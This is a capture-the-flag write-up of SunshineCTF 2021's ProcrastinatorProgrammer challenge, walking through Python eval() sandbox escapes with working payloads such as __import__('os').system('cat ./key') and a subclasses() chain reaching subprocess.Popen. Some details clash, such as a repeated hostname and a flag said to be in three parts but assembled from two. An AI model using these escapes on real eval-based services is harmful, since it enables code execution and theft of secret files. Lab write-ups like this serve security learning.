Scripting
ProcrastinatorProgrammer
The challenge description is long and the challenge seems complex.
This may be a mistake. Or mistakes were made.
>I may have procrastinated security for procrastinate.chal.2021.sunshinectf.org:65000. I may have been watching too many Tom Cruise movies instead of releasing this... uh... last year.
>But don't worry! The keys to the kingdom are split into three parts... you'll never find them all!
>Flag will be given by our backend in the standard sun{} format, but make sure you put all the pieces together!
- Description in image
Got a URL => Found out it’s a Python Sandbox Challenge
- This challenge is a chain-based problem. The player has to pass the previous level to pass the next level. There are three levels in this challenge.
1. First level
- Connect to the server:
nc procrastinate-sequel.chal.2021.sunshinectf.org 65000
- Result:
Welcome to the ProcrastinatorProgrammer backend.
Please give me an equation! Any equation! I need to be fed some data to do some processing!
I’m super secure, and can use all python! I just use eval() on your data and then whamo, python does all the work!
Whatever you do, don’t look at my ./key!
Give me an equation please!
- First attempt
- Payload:
chr(105) + chr(110) + chr(116) + chr(40) + chr(111) + chr(112) + chr(101) + chr(110) + chr(40) + chr(39) + chr(46) + chr(47) + chr(107) + chr(101) + chr(121) + chr(39) + chr(44) + chr(32) + chr(39) + chr(114) + chr(39) + chr(41) + chr(46) + chr(114) + chr(101) + chr(97) + chr(100) + chr(40) + chr(41) + chr(41)
- Result
int(open('./key', 'r').read())
If you completed part 1 of the challenge…
Your princess is in another castle! 🔥🏰🔥
procrastinate-castle.chal.2021.sunshinectf.org 65001 holds your next clue.
- Turns out that there’s some way to escape the Python sandbox.
- Second attempt
- Payload:
__import__('os').system('cat ./key')
- Result (shown as image below):
- Got first 1/3 of the flag:
sun{eval_is
2. Second level
- Connect to the server:
nc procrastinate-sequel.chal.2021.sunshinectf.org 65000
- Result:
Welcome to the ProcrastinatorProgrammer backend.
Please give me an equation! Any equation! I need to be fed some data to do some processing!
Due to technical difficulties with the last challenge, I’ve upped my ante! Now I know it’s secure!
I’m super secure, and can use most python math! I just use eval(client_input, {}, safe_math_functions) on your data and then whamo, python does all the work!
Whatever you do, don’t look at my ./key!
Halt in the name of the law!
What was the ./key found in the previous challenge?
- Using the same payload from the first level.
__import__('os').system('cat ./key')
- First attempt:
- Payload:
[].__class__.__base__.__subclasses__()
- Dump all the subclasses modules (shown as image below)
- And then I was stuck, because there are a lot of subclasses and I don’t know which to use. But I have a goal, which is to read the flag in ./key, thus I have to find a way to execute a read command in the system.
- I’ve tried:
[].__class__.__base__.__subclasses__().index('file')
to locate the file subclass, but found nothing.
- Several attempts after first one:
- First, I tried to look at the functionality of the modules I found above. And then I tried to use the module as the gadget to execute a read command in the system.
- Finally, I saw subprocess.Popen at the -4 location of the list. Thus I use
[].__class__.__base__.__subclasses__()[-4](["cat", "./key"])
as the payload. And finally obtained the last 1/3 of the flag, which is only_if_you_ast_whitelist_first} (shown as image below)
Concatenate the flag from each level
- Got flag:
sun{eval_is_safe_only_if_you_ast_whitelist_first}
Resources:
CTF results
Place and points
- We registered as ToInfinityAndBeYANd and got 663 points, which resulted in 13th place in the CTF among 302 teams.
Categories
- We solved 8 challenges: